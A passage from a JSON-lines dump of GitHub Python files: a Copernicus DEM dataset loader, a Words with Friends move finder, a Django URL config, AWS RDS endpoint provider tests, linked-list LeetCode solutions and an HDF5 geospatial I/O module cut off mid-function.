str\n _glob_code: Literal[\"30\", \"90\"]\n\n # DEM does not change a lot, so use wide valid bounds:\n time_bounds = TimeBounds(np.datetime64(\"1900-01-01\"), np.datetime64(\"2100-12-31\"))\n spatial_bounds = SpatialBounds(90, 180, -90, -180)\n crs = \"EPSG:4326\"\n\n raw_variables = [\n Variable(name=\"elevation\", unit=unit_registry.meter),\n ]\n variable_names = [\"elevation\"]\n variables = [VARIABLE_REFERENCE_LOOKUP[var] for var in variable_names]\n\n license = \"free\"\n bib = \"\"\"\n @misc{2022,\n doi 
= {10.5270/esa-c5d3d65},\n url = {https://doi.org/10.5270/esa-c5d3d65},\n year = {2022},\n publisher = {European Space Agency},\n author = {European Space Agency and Copernicus},\n title = {Copernicus Prism DEM}\n }\n \"\"\"\n data_url = \"https://spacedata.copernicus.eu/collections/copernicus-digital-elevation-model#anchor\"\n\n def __init__(self) -> None:\n \"\"\"Init.\"\"\"\n pass\n\n def download(\n self,\n download_dir: Path,\n time_bounds: TimeBounds,\n spatial_bounds: SpatialBounds,\n variable_names: list[str],\n overwrite: bool = False,\n ) -> bool:\n validation.validate_download_request(\n self,\n download_dir,\n time_bounds,\n spatial_bounds,\n variable_names,\n )\n\n download_folder = download_dir / self.name\n filenames = get_archive_filenames(spatial_bounds, self._glob_code)\n\n download_folder.mkdir(parents=True, exist_ok=True)\n for fname in filenames:\n utils.download_url(\n url=self.data_url + fname,\n fpath=download_folder / fname,\n overwrite=overwrite,\n )\n\n write_properties_file(\n download_folder, spatial_bounds, time_bounds, variable_names\n )\n\n return True\n\n def ingest(\n self,\n download_dir: Path,\n ingest_dir: Path,\n overwrite: bool = False,\n ) -> bool:\n download_folder = download_dir / self.name\n ingest_folder = ingest_dir / self.name\n ingest_folder.mkdir(parents=True, exist_ok=True)\n\n archive_file_pattern = \"Copernicus_DSM_*_00.tar\"\n archive_files = list(download_folder.glob(archive_file_pattern))\n\n for file in archive_files:\n convert_raw_dem_to_netcdf(\n ingest_folder,\n file=file,\n overwrite=overwrite,\n )\n\n copy_properties_file(download_folder, ingest_folder)\n\n return True\n\n def load(\n self,\n ingest_dir: Path,\n time_bounds: TimeBounds, # Unused in PrismDEM\n spatial_bounds: SpatialBounds,\n resolution: float,\n regrid_method: str,\n variable_names: list[str],\n ) -> xr.Dataset:\n for var in variable_names:\n if var not in self.variable_names:\n msg = (\n \"One or more variables are not in this dataset.\\n\"\n f\"Please check input. 
Dataset: '{self.name}'\\n\"\n f\"Variables: '{variable_names}'\"\n )\n raise ValueError(msg)\n files = list((ingest_dir / self.name).glob(\"*.nc\"))\n\n def preproc(ds: xr.Dataset) -> xr.Dataset:\n \"\"\"Remove overlapping coordinates on the edges.\"\"\"\n return ds.isel(latitude=slice(None, -1), longitude=slice(None, -1))\n\n ds = xr.open_mfdataset(files, preprocess=preproc)\n ds = regrid.regrid_data(ds, spatial_bounds, resolution, regrid_method)\n\n return ds\n\n def convert(\n self,\n ingest_dir: Path,\n convention: Union[str, Path],\n ) -> bool:\n converter.check_convention(convention)\n ingest_folder = ingest_dir / self.name\n\n data_file_pattern = \"Copernicus_DSM_*_00_DEM.nc\"\n\n data_files = list(ingest_folder.glob(data_file_pattern))\n\n for file in data_files:\n # start conversion process\n print(f\"Start processing file `{file.name}`.\")\n ds = xr.open_dataset(file)\n ds = converter.convert(ds, dataset=self, convention=convention)\n\n return True\n\n\nclass PrismDEM30(PrismDEM):\n \"\"\"The Prism Digital Elevation Model, GLO-30 version.\"\"\"\n\n name = \"prism-dem-30\"\n note = \"Armenia and Azerbaijan are not in this dataset.\"\n\n _glob_code = \"30\"\n\n data_url = \"https://prism-dem-open.copernicus.eu/pd-desk-open-access/prismDownload/COP-DEM_GLO-30-DGED__2021_1/\"\n\n\nclass PrismDEM90(PrismDEM):\n \"\"\"The Prism Digital Elevation Model, GLO-90 version.\"\"\"\n\n name = \"prism-dem-90\"\n\n _glob_code = \"90\"\n\n data_url = \"https://prism-dem-open.copernicus.eu/pd-desk-open-access/prismDownload/COP-DEM_GLO-90-DGED__2021_1/\"\n\n\ndef convert_raw_dem_to_netcdf(\n ingest_folder: Path,\n file: Path,\n overwrite: bool = False,\n) -> None:\n \"\"\"Convert a downloaded archived tiff file to a standard CF/Zampy netCDF file.\n\n Args:\n ingest_folder: Folder where the files have to be written to.\n file: Path to the Prism DEM .tar archive.\n overwrite: Overwrite all existing files. If False, file that already exist will\n be skipped.\n \"\"\"\n ncfile = ingest_folder / file.with_suffix(\".nc\").name\n if ncfile.exists() and not overwrite:\n print(f\"File '{ncfile.name}' already exists, skipping...\")\n else:\n ds = read_raw_dem(file)\n ds.to_netcdf(\n path=ncfile,\n encoding=ds.encoding,\n )\n\n\ndef read_raw_dem(file: Path) -> xr.Dataset:\n \"\"\"Parse the downloaded DEM compressed tif files, to CF/Zampy standard dataset.\n\n Args:\n file: Path to the Prism DEM .tar archive.\n\n Returns:\n CF/Zampy formatted xarray Dataset\n \"\"\"\n basename = file.with_suffix(\"\").name\n\n tf = tarfile.open(file)\n tfdata = tf.extractfile(f\"{basename}/DEM/{basename}_DEM.tif\")\n\n if tfdata is None:\n raise ValueError(f\"File {file} contains no data\")\n\n # Reading bytestream is flakey. 
rasterio has a MemoryFile module to allow reading\n # in-memory GeoTIFF file data:\n da = xr.open_dataarray(MemoryFile(tfdata), engine=\"rasterio\") # type: ignore\n\n da = da.sortby([\"x\", \"y\"]) # sort the dims ascending\n da = da.isel(band=0) # get rid of band dim\n da = da.drop_vars([\"band\", \"spatial_ref\"]) # drop unnecessary coords\n ds = da.to_dataset()\n ds = ds.rename(\n {\n \"band_data\": \"elevation\",\n \"x\": \"longitude\",\n \"y\": \"latitude\",\n }\n )\n ds[\"elevation\"].attrs.pop(\"AREA_OR_POINT\") # Remove tif leftover attr\n\n # The prism DEM variable & coords already follow the CF/Zampy convention\n for variable in ds.variables:\n variable_name = str(variable) # Cast to string to please mypy.\n if variable_name != \"time\":\n ds[variable_name].attrs[\"units\"] = str(\n VARIABLE_REFERENCE_LOOKUP[variable_name].unit\n )\n ds[variable_name].attrs[\"description\"] = VARIABLE_REFERENCE_LOOKUP[\n variable_name\n ].desc\n\n ds.encoding = {\n \"elevation\": {\n \"zlib\": True,\n \"complevel\": 5,\n }\n }\n return ds\n\n\ndef get_archive_filenames(\n bounds: SpatialBounds, glo_number: Literal[\"30\", \"90\"]\n) -> list[str]:\n \"\"\"Get all valid Prism dataset archive filenames within given spatial bounds.\n\n Args:\n bounds: Spatial bounds to be used to determine which tiles need to be\n downloaded.\n glo_number: Number code of GLO. Either 30 or 90.\n\n Returns:\n List of filenames.\n \"\"\"\n step = 1\n\n locs = np.meshgrid(\n np.arange(start=bounds.south, stop=bounds.north, step=step),\n np.arange(start=bounds.west, stop=bounds.east, step=step),\n )\n lats = locs[0].flatten()\n lons = locs[1].flatten()\n\n fnames = [\"\"] * len(lats)\n\n if glo_number == \"30\":\n file_code_number = 10\n elif glo_number == \"90\":\n file_code_number = 30\n else:\n raise ValueError(\"Unknown glo_number.\")\n\n for i, (lat, lon) in enumerate(zip(lats, lons)):\n lat_ = int(lat // step * step)\n lon_ = int(lon // step * step)\n\n latstr = str(abs(lat_)).rjust(2, \"0\")\n lonstr = str(abs(lon_)).rjust(3, \"0\")\n latstr = f\"N{latstr}\" if lat_ >= 0 else f\"S{latstr}\"\n lonstr = f\"E{lonstr}\" if lon_ >= 0 else f\"W{lonstr}\"\n fnames[i] = f\"Copernicus_DSM_{file_code_number}_{latstr}_00_{lonstr}_00.tar\"\n\n return get_valid_filenames(fnames)\n\n\ndef get_valid_filenames(filenames: list[str]) -> list[str]:\n \"\"\"Returns a new list with only the valid filenames.\"\"\"\n valid_filenames = \"\"\n\n for valid_name_file in VALID_NAME_FILES:\n with gzip.open(valid_name_file, \"rb\") as f:\n valid_filenames += f.read().decode(\"utf-8\")\n\n valid_names = []\n for fname in filenames:\n if fname in valid_filenames:\n valid_names.append(fname)\n return valid_names\n","repo_name":"EcoExtreML/zampy","sub_path":"src/zampy/datasets/prism_dem.py","file_name":"prism_dem.py","file_ext":"py","file_size_in_byte":10082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11753913593","text":"'''\nFunctions to calculate legal plays in Words with Friends. 
The approach is\nas follows:\n\n1) for each position on the board, find all possible lengths of words which\nbegin on that square and which connect to the currently played tiles.\n\n2) For each such length, find all words you can play that fill in a legal word\nof that length starting in that position and which make a legal word in that\nrow.\n\n3) For each tile you put down, check to make sure that the vertical words\nformed are legal plays.\n'''\n\nimport re\nfrom game_constants_wwf import *\nfrom game2 import *\n\n# The variables imported from board_state are BOARD, HAND and HAND_SIZE\n# The variables imported from game_constants_wwf are WORD_LIST_BY_LEN,\n# WORD_LIST_BY_HASH, TILE_VALUES, WORD_SCORE_MULTIPLIER,\n# LETTER_SCORE_MULTIPLIER and h.\n\ndef allowable_lengths(position):\n '''\n Returns a list of the possible lengths that a word beginning at position\n can have. Counts number of blank spaces to make sure you have enough tiles\n in hand to form the word.\n '''\n\n i, j = position\n row_length = len(BOARD[i])\n if j != 0 and BOARD[i][j-1] != ' ':\n return []\n else:\n count = 0\n if BOARD[i][j] == ' ':\n count += 1\n acceptable_lengths = []\n for k in range(j+1, row_length):\n if BOARD[i][k] == ' ':\n count += 1\n if k == row_length-1:\n if count:\n acceptable_lengths.append(k-j+1)\n break\n if BOARD[i][k+1] == ' ':\n if count:\n acceptable_lengths.append(k-j+1)\n if count == HAND_SIZE:\n break\n return [length for length in acceptable_lengths\n if has_neighbor(position, length)]\n\n\ndef has_neighbor(position, length):\n '''Boolean check whether a word beginning at position with this length will\n connect to the already played tiles on the board.'''\n\n i, j = position\n if (j != 0 and BOARD[i][j-1] != ' '\n or j != len(BOARD)-1 and BOARD[i][j+1] != ' '):\n return True\n for k in range(length):\n if (i != 0 and BOARD[i-1][j+k] != ' '\n or i != len(BOARD[j+k])-1 and BOARD[i+1][j+k] != ' '):\n return True\n return False\n\n\ndef find_legal_plays(position, length):\n '''Return a list of the words of this length starting at position which\n can be played horizontally given the current BOARD state and your current\n HAND and for which all the vertically formed words are also legal.'''\n\n i, j = position\n hand_tiles = '['+''.join(HAND)+']'\n re_pattern = re.compile(\n '^'+''.join(map(lambda x: hand_tiles if x == ' ' else x,\n BOARD[i][j:j+length]))+'$')\n\n def enough_letters_checker(word):\n '''Boolean check if the word can be played with tiles in hand.'''\n\n my_letters = BOARD[i][j:j+length]+HAND\n return all([word.count(ch) <= my_letters.count(ch) for ch in set(word)])\n\n return [word for word in WORD_LIST[length]\n if re_pattern.match(word)\n and vertical_word_checker(position, word)\n and enough_letters_checker(word)]\n\n\ndef vertical_word_checker(position, word):\n '''Boolean check if the vertical words formed by playing word at\n position are in the word list.'''\n\n i, j = position\n for k in range(len(word)):\n if BOARD[i][j+k] == ' ':\n column = [BOARD[m][j+k] for m in range(len(BOARD))]\n column[i] = word[k]\n if not all([len(word) == 1 or word in WORD_LIST[len(word)]\n for word in ''.join(column).split()]):\n return False\n return True\n\n\ndef score_play(position, word):\n '''Return the score for playing the given word starting at\n position.'''\n\n def iter_scorer(nexter, position, word, multiplier, score):\n '''Iterative form of the function. 
Schemey.'''\n\n if len(word) == 0:\n return multiplier*score\n return iter_scorer(\n nexter,\n nexter(position),\n word[1:],\n multiplier*word_score(position),\n score+letter_score(position)*tile_score(word[0]))\n i, j = position\n score = 0\n score += iter_scorer(lambda x: (x[0], x[1]+1), position, word, 1, 0)\n for k in [m for m in range(len(word)) if BOARD[i][j+m] == ' ']:\n beg = i\n end = i\n while beg != 0 and BOARD[beg-1][j+k] != ' ':\n beg -= 1\n while end != len(BOARD)-1 and BOARD[end+1][j+k] != ' ':\n end += 1\n if beg != end:\n column = [BOARD[m][j+k] for m in range(len(BOARD))]\n column[i] = word[k]\n side_word = ''.join([column[m] for m in range(beg, end+1)])\n score += iter_scorer(\n lambda x: (x[0]+1, x[1]), (beg, j+k), side_word, 1, 0)\n return score\n\n\ndef letter_score(position):\n '''Double/Triple Letter Score multiplier.'''\n\n i, j = position\n if BOARD[i][j] != ' ':\n return 1\n return LETTER_SCORE_MULTIPLIER.get(position, 1)\n\n\ndef word_score(position):\n '''Double/Triple Word Score multiplier.'''\n\n i, j = position\n if BOARD[i][j] != ' ':\n return 1\n return WORD_SCORE_MULTIPLIER.get(position, 1)\n\n\ndef tile_score(tile):\n '''Point value for the letter ch.'''\n\n return TILE_VALUES[tile]\n\n\ndef list_plays_and_scores(position):\n '''Return a list of tuples of the form (score, word, position) which\n enumerate the possible legal horizontal plays and the corresponding\n score.'''\n\n play_score_list = []\n for length in allowable_lengths(position):\n play_score_list += [(score_play(position, play), play, position)\n for play in find_legal_plays(position, length)]\n return play_score_list\n\ndef flip_board():\n '''Persistently flip global BOARD. Enables the reuse of the above code to\n calculate vertical plays as well.'''\n\n global BOARD\n BOARD = [[BOARD[i][j] for i in range(len(BOARD))]\n for j in range(len(BOARD))]\n","repo_name":"dodgejoel/words_solver","sub_path":"play_finder_wwf.py","file_name":"play_finder_wwf.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25416791963","text":"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom .views import editOwner, index, newUser, owner, vet, newVeterinary, logoutview, official, editVet, addPetCase\n\nurlpatterns = [\n path('', index, name=\"index\"),\n path('newUser/', newUser, name='newUser'),\n path('newVeterinary/', newVeterinary, name='newVeterinary'),\n path('Official/', official, name=\"official\"),\n path('editOwner/', editOwner, name=\"editOwner\"),\n path('Owner/', owner, name=\"owner\"),\n path('Vet/', vet, name=\"vet\"),\n path('addPetCase/', addPetCase, name=\"addPetCase\"),\n path('editVet/', editVet, name=\"editVet\"),\n path('logout/', logoutview, name=\"logout\"),\n path('login/', index, name=\"login\"),\n\n]\n","repo_name":"luhemapo/ProyectoFinalProg2","sub_path":"proyectofinalprog2/cuatropatas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18025812527","text":"import uuid\nimport botocore\nfrom botocore.stub import Stubber, ANY\nfrom db_cluster_endpoint_provider import DBClusterEndpointProvider\n\nprovider = DBClusterEndpointProvider()\nprovider.sleep_period_in_seconds = 0.1\n\ndef test_create_endpoint():\n\n request = Request(\n \"Create\",\n properties = {\n \"DBClusterIdentifier\": \"aurora\",\n \"DBClusterEndpointIdentifier\": 
\"readers\",\n \"EndpointType\": \"READER\",\n \"StaticMembers\": [\"instance1\"],\n },\n )\n rds = botocore.session.get_session().create_client(\n \"rds\", region_name=\"eu-central-1\"\n )\n stubber = Stubber(rds)\n stubber.add_response(\n \"create_db_cluster_endpoint\",\n CreateDbClusterEndpointReponse(request),\n request[\"ResourceProperties\"],\n )\n stubber.add_response(\n \"describe_db_cluster_endpoints\",\n DescribeDBClusterEndpointReponse(request, \"creating\"),\n {\"DBClusterEndpointIdentifier\": \"readers\"},\n )\n stubber.add_response(\n \"describe_db_cluster_endpoints\",\n DescribeDBClusterEndpointReponse(request, \"available\"),\n {\"DBClusterEndpointIdentifier\": \"readers\"},\n )\n stubber.activate()\n provider.rds = rds\n\n response = provider.handle(request, ())\n assert response[\"Status\"] == \"SUCCESS\", response[\"Reason\"]\n stubber.assert_no_pending_responses()\n\ndef test_update_endpoint():\n\n request = Request(\n \"Update\",\n properties = {\n \"DBClusterIdentifier\": \"aurora\",\n \"DBClusterEndpointIdentifier\": \"readers\",\n \"EndpointType\": \"READER\",\n \"StaticMembers\": [\"instance2\"],\n },\n old_properties = {\n \"DBClusterIdentifier\": \"aurora\",\n \"DBClusterEndpointIdentifier\": \"readers\",\n \"EndpointType\": \"READER\",\n \"StaticMembers\": [\"instance1\"],\n },\n )\n rds = botocore.session.get_session().create_client(\n \"rds\", region_name=\"eu-central-1\"\n )\n stubber = Stubber(rds)\n stubber.add_response(\n \"modify_db_cluster_endpoint\",\n CreateDbClusterEndpointReponse(request),\n {'DBClusterEndpointIdentifier': 'readers', 'StaticMembers': ['instance2']},\n )\n stubber.add_response(\n \"describe_db_cluster_endpoints\",\n DescribeDBClusterEndpointReponse(request, \"modifying\"),\n {\"DBClusterEndpointIdentifier\": \"readers\"},\n )\n stubber.add_response(\n \"describe_db_cluster_endpoints\",\n DescribeDBClusterEndpointReponse(request, \"available\"),\n {\"DBClusterEndpointIdentifier\": \"readers\"},\n )\n stubber.activate()\n provider.rds = rds\n\n response = provider.handle(request, ())\n assert response[\"Status\"] == \"SUCCESS\", response[\"Reason\"]\n stubber.assert_no_pending_responses()\n\ndef test_invalid_update_endpoint():\n\n request = Request(\n \"Update\",\n properties = {\n \"DBClusterIdentifier\": \"aurora-2\",\n \"DBClusterEndpointIdentifier\": \"readers-1\",\n \"EndpointType\": \"WRITER\",\n \"StaticMembers\": [\"instance2\"],\n \"Tags\": [{\"Key\": \"Name\", \"Value\": \"writer\"}]\n },\n old_properties = {\n \"DBClusterIdentifier\": \"aurora\",\n \"DBClusterEndpointIdentifier\": \"readers\",\n \"EndpointType\": \"READER\",\n \"StaticMembers\": [\"instance1\"],\n },\n )\n rds = botocore.session.get_session().create_client(\n \"rds\", region_name=\"eu-central-1\"\n )\n stubber = Stubber(rds)\n stubber.activate()\n provider.rds = rds\n\n response = provider.handle(request, ())\n assert response[\"Status\"] == \"FAILED\", response[\"Reason\"]\n assert response[\"Reason\"] == 'these properties cannot be updated: DBClusterEndpointIdentifier, DBClusterIdentifier, Tags'\n stubber.assert_no_pending_responses()\n\ndef test_delete_endpoint():\n\n request = Request(\n \"Delete\",\n properties = {\n \"DBClusterIdentifier\": \"aurora\",\n \"DBClusterEndpointIdentifier\": \"readers\",\n \"EndpointType\": \"READER\",\n \"StaticMembers\": [\"instance2\"],\n },\n )\n rds = botocore.session.get_session().create_client(\n \"rds\", region_name=\"eu-central-1\"\n )\n stubber = Stubber(rds)\n stubber.add_response(\n 
\"delete_db_cluster_endpoint\",\n CreateDbClusterEndpointReponse(request),\n {'DBClusterEndpointIdentifier': 'readers'},\n )\n stubber.add_response(\n \"describe_db_cluster_endpoints\",\n DescribeDBClusterEndpointReponse(request, \"deleting\"),\n {\"DBClusterEndpointIdentifier\": \"readers\"},\n )\n stubber.add_response(\n \"describe_db_cluster_endpoints\",\n DescribeDBClusterEndpointReponse(request, status=None),\n {\"DBClusterEndpointIdentifier\": \"readers\"},\n )\n stubber.activate()\n provider.rds = rds\n\n response = provider.handle(request, ())\n assert response[\"Status\"] == \"SUCCESS\", response[\"Reason\"]\n stubber.assert_no_pending_responses()\n\n\n\nclass Request(dict):\n def __init__(self, request_type, properties:dict, old_properties:dict = {}, physical_resource_id=None):\n request_id = \"request-%s\" % uuid.uuid4()\n self.update(\n {\n \"RequestType\": request_type,\n \"ResponseURL\": \"https://httpbin.org/put\",\n \"StackId\": \"arn:aws:cloudformation:us-west-2:EXAMPLE/stack-name/guid\",\n \"RequestId\": request_id,\n \"ResourceType\": \"Custom::DBClusterEndpoint\",\n \"LogicalResourceId\": \"Endpoint\",\n \"ResourceProperties\": properties,\n\n }\n )\n if physical_resource_id:\n self[\"PhysicalResourceId\"] = physical_resource_id\n elif request_type != \"Create\":\n self[\"PhysicalResourceId\"] = f\"arn:aws:rds:eu-central-1:123456789012:{properties['DBClusterIdentifier']}:{properties['DBClusterEndpointIdentifier']}\"\n\n if request_type == \"Update\":\n self[\"OldResourceProperties\"] = old_properties if old_properties else {}\n\n\nclass CreateDbClusterEndpointReponse(dict):\n def __init__(self, request):\n status = {\"Create\": \"creating\", \"Update\": \"modifying\", \"Delete\": \"deleting\"}\n\n self[\"ResponseMetadata\"] = {\n \"RequestId\": request[\"RequestId\"],\n \"HTTPStatusCode\": 200,\n \"HTTPHeaders\": {\n \"x-amzn-requestid\": \"2c7bd3fe-730c-4d24-b9a5-1942193a091a\",\n \"content-type\": \"text/xml\",\n \"content-length\": \"275\",\n \"date\": \"Sat, 16 Nov 2019 17:58:29 GMT\",\n },\n \"RetryAttempts\": 0,\n }\n properties = request[\"ResourceProperties\"]\n self.update(\n {\n \"DBClusterEndpointIdentifier\": properties[\"DBClusterEndpointIdentifier\"],\n \"DBClusterIdentifier\": properties[\"DBClusterIdentifier\"],\n \"DBClusterEndpointResourceIdentifier\": f\"request['DBClusterEndpointIdentifier']-ANPAJ4AE5446DAEXAMPLE\",\n \"Endpoint\": f\"{properties['DBClusterEndpointIdentifier']}.{properties['DBClusterIdentifier']}.eu-central-1.rds.amazonaws.com\",\n \"Status\": status[request[\"RequestType\"]],\n \"EndpointType\": \"CUSTOM\",\n \"CustomEndpointType\": properties[\"EndpointType\"],\n \"StaticMembers\": properties.get(\"StaticMembers\", []),\n \"ExcludedMembers\": properties.get(\"ExcludedMembers\", []),\n \"DBClusterEndpointArn\": f\"arn:aws:rds:eu-central-1:123456789012:{properties['DBClusterIdentifier']}:{properties['DBClusterEndpointIdentifier']}\",\n }\n )\n\n\nclass DescribeDBClusterEndpointReponse(dict):\n def __init__(self, request, status=None):\n self[\"ResponseMetadata\"] = {\n \"RequestId\": request[\"RequestId\"],\n \"HTTPStatusCode\": 200,\n \"HTTPHeaders\": {\n \"x-amzn-requestid\": \"2c7bd3fe-730c-4d24-b9a5-1942193a091a\",\n \"content-type\": \"text/xml\",\n \"content-length\": \"275\",\n \"date\": \"Sat, 16 Nov 2019 17:58:29 GMT\",\n },\n \"RetryAttempts\": 0,\n }\n properties = request[\"ResourceProperties\"]\n if status:\n self.update(\n {\n \"DBClusterEndpoints\": [\n {\n \"DBClusterIdentifier\": 
properties[\"DBClusterIdentifier\"],\n \"Endpoint\": f\"{properties['DBClusterEndpointIdentifier']}.{properties['DBClusterIdentifier']}.eu-central-1.rds.amazonaws.com\",\n \"Status\": status,\n \"EndpointType\": properties[\"EndpointType\"],\n }\n ]\n }\n )\n else:\n self.update({ \"DBClusterEndpoints\": []})\n","repo_name":"binxio/cfn-db-cluster-endpoint-provider","sub_path":"tests/test_db_cluster_endpoint_provider.py","file_name":"test_db_cluster_endpoint_provider.py","file_ext":"py","file_size_in_byte":8839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18988265006","text":"'''\nDescription: \nAuthor: Tjg\nDate: 2021-06-08 20:48:32\nLastEditTime: 2021-06-08 22:21:18\nLastEditors: Please set LastEditors\n'''\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n def __repr__(self):\n print_string = []\n \n print_string.append(str(self.val))\n p = self.next\n while p != None:\n print_string.append(str(p.val))\n p = p.next\n return \"->\".join(print_string)\n\n# 迭代法 不对称\nclass Solution:\n def mergeTwoLists(self, l1: ListNode, l2: ListNode) -> ListNode:\n dummy = ListNode(0,l1)\n prev = dummy\n while l1 != None and l2 != None:\n # print(\"pre\",dummy.next,prev,l1,l2)\n if l1.val >= l2.val:\n prev.next = l2\n prev = prev.next\n l2 = l2.next\n prev.next = l1\n else:\n l1 = l1.next\n prev = prev.next\n # print(\"pas\",dummy.next)\n\n if l1 == None: \n# 是prev.next 而不是l1,因为l1只是个指针,仅仅是l1指针指向\n# 新的地址,而没有把l1,l2连接起来\n prev.next= l2 \n return dummy.next\n\n# 迭代法 对称\nclass Solution:\n def mergeTwoLists(self, l1, l2):\n prehead = ListNode(-1)\n\n prev = prehead\n while l1 and l2:\n if l1.val <= l2.val:\n prev.next = l1\n l1 = l1.next\n else:\n prev.next = l2\n l2 = l2.next \n prev = prev.next\n\n # 合并后 l1 和 l2 最多只有一个还未被合并完,我们直接将链表末尾指向未合并完的链表即可\n prev.next = l1 if l1 is not None else l2\n\n return prehead.next\n\n# 递归法\nclass Solution:\n def mergeTwoLists(self, l1, l2):\n if l1 is None:\n return l2\n elif l2 is None:\n return l1\n elif l1.val < l2.val:\n l1.next = self.mergeTwoLists(l1.next, l2)\n return l1\n else:\n l2.next = self.mergeTwoLists(l1, l2.next)\n return l2\n\nl1 = ListNode(3)\n# l1.next = ListNode(2)\n# l1.next.next = ListNode(4)\n\nl2 = ListNode(2)\n# l2.next = ListNode(3)\n# l2.next.next = ListNode(4)\nprint(l1,l2)\ns1 = Solution()\nans = s1.mergeTwoLists(l1,l2)\nprint(ans)\n","repo_name":"planetInGalaxy/LeetCode","sub_path":"剑指offer/25合并两个有序链表.py","file_name":"25合并两个有序链表.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"9401882509","text":"import numpy as np\nimport xarray as xr\nimport h5py\nfrom collections import namedtuple\n\nfrom . 
import DGGS\n\nBandInfo = namedtuple('BandInfo', ['dtype', 'nodata', 'block', 'name'])\nGeoFileInfo = namedtuple('GeoFileInfo', ['crs', 'affine', 'shape', 'bands'])\n\n\ndef _h5_parse_structure(f):\n sites = {}\n bands = []\n\n def valid_address(addr: str):\n code, *digits = addr\n return (code in 'SNOPQR' and\n set(digits).issubset('012345678')) # TODO: assumes 3x3 dggs\n\n def add(addr, shape):\n v = sites.get(addr)\n if v and v != shape:\n raise RuntimeError('Incompatible shapes detected')\n else:\n sites[addr] = shape\n\n for band, g in f.items():\n if not isinstance(g, h5py.Group):\n continue\n\n count = 0\n\n for addr, ds in g.items():\n if valid_address(addr) and isinstance(ds, h5py.Dataset):\n add(addr, ds.shape)\n count += 1\n\n if count > 0:\n bands.append(band)\n\n return bands, sites\n\n\ndef h5_load(fname, bands=None, dg=DGGS()):\n\n def read_bands(f, addr, shape, bands):\n h, w = shape[:2]\n roi = dg.ROI(addr, w, h)\n coords = dg.xy_from_roi(roi)[::-1]\n\n dims = ('y', 'x')\n\n def read(band):\n path = band + '/' + addr\n ds = f.get(path)\n if ds is None:\n # TODO: need to know dtype and nodata value for the band\n raise NotImplementedError(\"Currently only support homogeneous data across bands\")\n else:\n if ds.shape != shape:\n raise NotImplementedError(\"Currently only support homogeneous data across bands\")\n\n dd = np.empty(shape, dtype=ds.dtype)\n ds.read_direct(dd)\n\n # TODO: nodata\n return xr.DataArray(dd,\n dims=dims,\n name=band,\n coords=coords,\n attrs=dict(addr=addr))\n\n return xr.Dataset({band: read(band) for band in bands},\n attrs=dict(addr=addr))\n\n with h5py.File(fname, 'r') as f:\n bands_, sites = _h5_parse_structure(f)\n if bands is None:\n bands = bands_\n else:\n # TODO: verify that requested bands are present in a file\n pass\n\n return [read_bands(f, addr, shape, bands)\n for (addr, shape) in sites.items()]\n\n\nclass H5Writer(object):\n def __init__(self, fname, chunk_size=3**5):\n self.fname = fname\n self._chunk_size = chunk_size\n self._f = None\n self._opts = dict(compression='gzip',\n shuffle=True)\n\n def _chunks(self, shape):\n a = min(shape[0], self._chunk_size)\n b = min(shape[1], self._chunk_size)\n return (a, b) + shape[2:]\n\n def __enter__(self):\n self._f = h5py.File(self.fname, 'w')\n return self\n\n def __exit__(self, t, v, traceback):\n self._f.close()\n self._f = None\n\n def __call__(self, addr, band, data, nodata=None):\n f = self._f\n g = f.get(band)\n\n if g is None:\n g = f.create_group(band)\n elif not isinstance(g, h5py.Group):\n raise IOError('TODO: fix error message')\n\n if not isinstance(addr, str):\n addr = str(addr)\n\n ds = g.create_dataset(addr,\n data=data,\n chunks=self._chunks(data.shape),\n fillvalue=nodata,\n **self._opts)\n if ds.ndim >= 2:\n ds.dims[0].label = 'y'\n ds.dims[1].label = 'x'\n\n\ndef h5_save(fname, datasets, chunk_size=3**5):\n if not isinstance(datasets, (tuple, list)):\n datasets = [datasets]\n\n with H5Writer(fname, chunk_size=chunk_size) as write:\n for ds in datasets:\n assert hasattr(ds, 'addr')\n\n for name, da in ds.data_vars.items():\n nodata = da.attrs.get('nodata', None)\n write(ds.addr, name, da.values, nodata=nodata)\n\n return True\n\n\ndef slurp(fname, proc=None, keep_eol=False):\n import gzip\n import lzma\n\n _open = open\n\n if fname.endswith('.gz'):\n _open = gzip.open\n if fname.endswith('.xz'):\n _open = lzma.open\n\n def mk_proc(proc):\n maybe_strip = (lambda s: s.rstrip('\\n')) if keep_eol is False else (lambda s: s)\n\n if proc is None:\n return maybe_strip\n else:\n 
return lambda s: proc(maybe_strip(s))\n\n with _open(fname, 'rt') as f:\n return list(map(mk_proc(proc), f.readlines()))\n\n\ndef dump_text(txt, fname=None):\n import gzip\n import lzma\n import sys\n\n eol = '\\n'\n\n def write_to(txt, f):\n if isinstance(txt, str):\n f.write(txt)\n else:\n f.writelines(map(lambda x: str(x) + eol, txt))\n\n if fname is None:\n write_to(txt, sys.stdout)\n return True\n\n _open = open\n\n if fname.endswith('.gz'):\n _open = gzip.open\n if fname.endswith('.xz'):\n _open = lzma.open\n\n with _open(fname, 'wt') as f:\n write_to(txt, f)\n\n return True\n\n\ndef load_shapes(fname, pred=lambda _: True, with_attributes=True):\n import fiona\n from shapely.geometry import shape\n\n def mk_shape(g):\n sh = shape(g['geometry'])\n if with_attributes:\n sh.attrs = g['properties'].copy()\n return sh\n\n with fiona.open(fname, 'r') as f:\n shapes = [mk_shape(g)\n for g in f.values() if pred(g)]\n\n return shapes, f.crs\n\n\ndef load_polygons(fname):\n return load_shapes(fname, lambda g: g['geometry']['type'] == 'Polygon')\n\n\ndef save_png(fname, im, bgr=False, binary=None):\n import cv2\n\n if im.ndim == 3 and bgr is False:\n _, _, nc = im.shape\n if nc == 3:\n im = im[:, :, ::-1] # Convert to BGR\n elif nc == 4:\n im = im[:, :, [2, 1, 0, 3]] # Convert to BGRA\n\n png_opts = (cv2.IMWRITE_PNG_COMPRESSION, 9)\n\n if im.dtype == 